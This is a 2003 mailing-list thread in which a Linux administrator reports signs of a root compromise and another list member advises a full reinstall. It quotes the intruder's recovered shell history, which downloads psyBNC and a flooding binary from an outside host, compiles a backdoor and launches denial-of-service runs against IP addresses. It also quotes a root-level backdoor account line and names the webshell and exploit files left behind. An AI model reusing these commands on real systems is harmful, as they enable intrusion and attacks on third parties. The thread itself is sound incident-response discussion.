Backup /etc and any other data you have, and you can reference your configuration files later during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking you can 'recover' from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again maybe you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your existing configuration files (though I would NOT use them as-is without inspection, since they could potentially have backdoor'd the configs as well). Good luck. Josh Markus Schabel ([EMAIL PROTECTED]) wrote: > Laurent Corbes {Caf'} wrote: > >On Wed, 17 Sep 2003 22:29:58 +0200 > >Markus Schabel <[EMAIL PROTECTED]> wrote: > > > > > >>I've seen some strange things on my (stable with security-updates) > >>server: the last apt-get update didn't work because gzip segfaultet. > >>I've copied gzip from another server over the version on this server, > >>but it also crashed. Interesting was that the executable was bigger > >>after the segfault. > > > > > >curious. > > > > > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no > >>idea where they come from. > > > > > >it's the daily cronjob that stole. > > yes, and that's reproducable :( > > >>You think the server got hacked? Are there any other things that can > >>lead to this? man also behaves strange, it says either "No manual entry > >>for...", "What manual page do you want?" or nothing. > > > > > >i'm thinking about a hardware problem. > >may the harddrive is in failure (get the ouput of dmesg) or a very big > >ram problem that corrupt files on the hard drive. > > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1 > ptrace uses obsolete (PF_INET,SOCK_PACKET) > eth0: Promiscuous mode enabled. > device eth0 entered promiscuous mode > eth0: Promiscuous mode enabled. > > but nothing about the disks > > >in every case simply copy all the data you can and inspect the hdd in > >another box mounting it read only. > > setuid.changes lists /dev/* and the following programs: > pppd > postdrop > postqueue > wall > newgrp > at > chage > chfn > chsh > expiry > gpasswd > passwd > write > crontab > dotlockfile > ssh-keysign > procmail > lockfile > popauth > pt_chown > traceroute > mount > umount > login > su > ping > suexec > /usr/lib/mc/bin/cons.saver > > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash > > in /etc/.rpn theres a .bash_history with the following content: > > >id > >mkdir /etc/.rpn > >ps -aux > >ps -aux | grep tbk > >kill -15292 pid > >kill 15292 > >netconf > >locate httpd.conf > >cd /etc/.rpn > >ls -al > >wget > >cd /var/www/cncmap/www/upload/renegade > >ls -al > >rm -rf phpshell.php > >cat bd.c > >gcc -o bd bd.c > >ftp ftp.hpg.com.br > >rm -rf bd.c > >cd /tmp > >cd /etc/.rpn > >wget www.slacks.hpg.com.br/psyBNC.tar.gz > >tar zvxf psyBNC.tar.gz > >tar -zvxf psyBNC.tar.gz > >tar > >gunzip psyBNC.tar.gz > >tar -Acdtrux psyBNC.tar.gz > >tar -x psyBNC.tar.gz > >tar -Acd psyBNC.tar.gz > >tar -cd psyBNC.tar.gz > >tar --help > >pwd > >ls > >rm -rf * > >wget www.slacks.hpg.com.br/bin/dos > >chmod +x dos > >./dos > >./dos 200.101.87.8 65535 8569 > >./dos 200.199.95.11 65535 8569 > > and the executable dos > > interesting is the line "tar --help" :D > > in "last" I see the following: > > >slacks pts/0 Sun Sep 14 02:26 - 03:37 (01:11) > >200-147-107-35.tlm.dialuol.com.br > > IP of the hacker is 200.147.107.35 > I think we have no chance of legal actions against .br? > > in the directory /var/www/cncmap/www/upload/renegade there are the > following files: backhole.pl > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, > LES-EXPLOIT for Linux x86") > rem.php (phpRemoteView) > > so we got hacked :( > > what informations should we gather before we reinstall the complete > server? I think we have to reinstall the whole thing or do you have > any ideas? > > thanks > Markus > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]